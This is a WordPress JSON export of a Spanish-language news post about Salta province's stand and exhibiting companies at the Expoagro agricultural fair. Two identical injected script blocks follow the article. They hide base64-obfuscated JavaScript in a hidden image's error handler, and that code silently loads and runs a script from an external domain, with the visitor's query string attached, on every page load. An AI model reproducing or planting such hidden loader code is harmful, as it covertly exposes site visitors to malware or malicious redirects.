{"id":3801,"date":"2024-03-04T16:49:47","date_gmt":"2024-03-04T19:49:47","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3801"},"modified":"2025-08-13T23:59:22","modified_gmt":"2025-08-14T02:59:22","slug":"salta-estara-nuevamente-presente-en-expoagro","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3801","title":{"rendered":"Salta estar\u00e1 nuevamente presente en Expoagro"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-dbb6447030035ef13e84da6b65a55722\" style=\"background-color:#c80b3a\"><em>Se trata del evento agroindustrial m\u00e1s importante del pa\u00eds y que se desarrollar\u00e1 hasta el pr\u00f3ximo viernes 8 de marzo, en la provincia de Buenos Aires.<\/em> <\/h3>\n\n\n\n<p>Desde ma\u00f1ana y hasta el pr\u00f3ximo viernes 8 de marzo, Salta estar\u00e1 presente, una vez m\u00e1s, en una nueva edici\u00f3n de Expoagro, que se desarrollar\u00e1 en la localidad bonaerense de San Nicol\u00e1s.&nbsp;<\/p>\n\n\n\n<p>Para ello, el&nbsp;<strong>Ministerio de Producci\u00f3n y Desarrollo Sustentable<\/strong>, en apoyo a las PyMEs salte\u00f1as, realiz\u00f3 una convocatoria, a trav\u00e9s de la Secretar\u00eda de Industria, Comercio y Empleo, destinada a empresas que quieran formar parte de la comitiva de nuestra provincia, en el evento.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1012\" height=\"600\" data-id=\"3804\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6171-salta-estara-nuevamente-presente-en-expoagro.jpeg\" alt=\"\" class=\"wp-image-3804\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6171-salta-estara-nuevamente-presente-en-expoagro.jpeg 1012w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6171-salta-estara-nuevamente-presente-en-expoagro-300x178.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6171-salta-estara-nuevamente-presente-en-expoagro-768x455.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6171-salta-estara-nuevamente-presente-en-expoagro-696x413.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6171-salta-estara-nuevamente-presente-en-expoagro-708x420.jpeg 708w\" sizes=\"(max-width: 1012px) 100vw, 1012px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1012\" height=\"600\" data-id=\"3803\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6170-salta-estara-nuevamente-presente-en-expoagro.jpeg\" alt=\"\" class=\"wp-image-3803\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6170-salta-estara-nuevamente-presente-en-expoagro.jpeg 1012w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6170-salta-estara-nuevamente-presente-en-expoagro-300x178.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6170-salta-estara-nuevamente-presente-en-expoagro-768x455.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6170-salta-estara-nuevamente-presente-en-expoagro-696x413.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6170-salta-estara-nuevamente-presente-en-expoagro-708x420.jpeg 708w\" sizes=\"(max-width: 1012px) 100vw, 1012px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1012\" height=\"600\" data-id=\"3802\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6169-salta-estara-nuevamente-presente-en-expoagro.jpeg\" alt=\"\" class=\"wp-image-3802\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6169-salta-estara-nuevamente-presente-en-expoagro.jpeg 1012w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6169-salta-estara-nuevamente-presente-en-expoagro-300x178.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6169-salta-estara-nuevamente-presente-en-expoagro-768x455.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6169-salta-estara-nuevamente-presente-en-expoagro-696x413.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/6169-salta-estara-nuevamente-presente-en-expoagro-708x420.jpeg 708w\" sizes=\"(max-width: 1012px) 100vw, 1012px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Cabe destacar que el potencial productivo provincial y de las manufacturas salte\u00f1as podr\u00e1n apreciarse en el stand institucional, que contar\u00e1, adem\u00e1s, con un sector comercial para que productores de alimentos, bebidas y artesan\u00edas de calidad, expongan y vendan sus art\u00edculos.<\/p>\n\n\n\n<p>Asimismo, el espacio servir\u00e1 para promocionar a la provincia, que obtuvo varios galardones en otros predios feriales y para atraer posibles inversiones o misiones comerciales. Tambi\u00e9n posibilitar\u00e1 un lugar para reuniones y negociaciones, destinado a empresas agropecuarias locales.&nbsp;<\/p>\n\n\n\n<p>El stand de Salta contar\u00e1 con la presencia de: Vinos del Norte, Compa\u00f1\u00eda Industrial Cervecera S.A; TahuaInti &#8211; Miel de Uva, Agro San Pedro SRL, Dulces Chicoana SRL, La Negrita Regionales, Cosa de Machos, Yama Sabores Ahumados, La Esquina del Carpincho, AM La Caldera, Art Salta, y Patricia Rivas Indumentaria y Accesorios.&nbsp;<\/p>\n\n\n\n<p>Expoagro agrupar\u00e1 a m\u00e1s de 600 expositores, empresas y entidades bancarias p\u00fablicas y privadas. Adem\u00e1s de un \u00e1rea con tecnolog\u00eda digital y universidades.&nbsp;<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-estara-nuevamente-presente-en-expoagro-94475\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se trata del evento agroindustrial m\u00e1s importante del pa\u00eds y que se desarrollar\u00e1 hasta el pr\u00f3ximo viernes 8 de marzo, en la provincia de Buenos Aires. Desde ma\u00f1ana y hasta el pr\u00f3ximo viernes 8 de marzo, Salta estar\u00e1 presente, una vez m\u00e1s, en una nueva edici\u00f3n de Expoagro, que se desarrollar\u00e1 en la localidad bonaerense [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3805,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20],"tags":[],"class_list":{"0":"post-3801","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3801"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3801"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3801\/revisions"}],"predecessor-version":[{"id":6835,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3801\/revisions\/6835"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3805"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3801"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3801"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3801"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}